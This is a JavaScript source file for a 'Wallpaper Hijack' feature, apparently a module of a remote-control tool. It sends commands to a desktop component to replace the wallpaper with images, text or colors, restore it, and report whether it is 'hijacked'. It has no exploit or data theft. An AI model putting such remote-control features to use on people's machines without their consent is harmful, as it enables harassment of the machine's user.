import { BaseFeature } from '../../core/base-feature.js';

/**
 * WallpaperHijackFeature - Frontend feature for remote wallpaper control
 *
 * Sends commands to desktop to change wallpaper to images, text, or solid colors.
 */
export class WallpaperHijackFeature extends BaseFeature {
    constructor(coreAPI) {
        super(coreAPI);
        this.currentState = 'original';
        this.pendingRequests = new Map();
    }

    static getMetadata() {
        return {
            id: 'wallpaper-hijack',
            name: 'Wallpaper Hijack',
            version: 'v1.0',
            capabilities: [
                'set_image',
                'set_text',
                'set_color',
                'restore',
                'get_state'
            ],
            dependencies: []
        };
    }

    async initialize() {
        console.log('[WallpaperHijack] Registered');
    }

    /**
     * Set wallpaper to a base64-encoded image
     * @param {string} base64Data - Base64 image data (without data: prefix)
     * @param {string} filename - Original filename for extension detection
     */
    setImage(base64Data, filename) {
        return this.sendMessage('set_image', { base64Data, filename });
    }

    /**
     * Set wallpaper to rendered text
     * @param {string} text - Text to display
     * @param {number} fontSize - Font size in pixels
     * @param {string} color - Text color (CSS)
     * @param {string} bgColor - Background color (CSS)
     */
    setText(text, fontSize = 48, color = '#ffffff', bgColor = '#000000') {
        return this.sendMessage('set_text', { text, fontSize, color, bgColor });
    }

    /**
     * Set wallpaper to a solid color
     * @param {string} color - CSS color value
     */
    setColor(color) {
        return this.sendMessage('set_color', { color });
    }

    /**
     * Restore the original wallpaper
     */
    restore() {
        return this.sendMessage('restore', {});
    }

    /**
     * Get current wallpaper state
     */
    getState() {
        return this.sendMessage('get_state', {});
    }

    async handleMessage(message) {
        const { action, payload } = message;

        switch (action) {
            case 'set_image_response':
            case 'set_text_response':
            case 'set_color_response':
                if (payload.success) {
                    this.currentState = 'hijacked';
                    this.emit('stateChanged', { currentState: 'hijacked' });
                }
                this.emit('commandResult', payload);
                break;

            case 'restore_response':
                if (payload.success) {
                    this.currentState = 'original';
                    this.emit('stateChanged', { currentState: 'original' });
                }
                this.emit('commandResult', payload);
                break;

            case 'get_state_response':
                if (payload.success) {
                    this.currentState = payload.currentState;
                    this.emit('stateChanged', { currentState: payload.currentState, originalPath: payload.originalPath });
                }
                break;

            default:
                console.warn(`[WallpaperHijack] Unknown action: ${action}`);
        }
    }

    async cleanup() {
        this.pendingRequests.clear();
    }
}
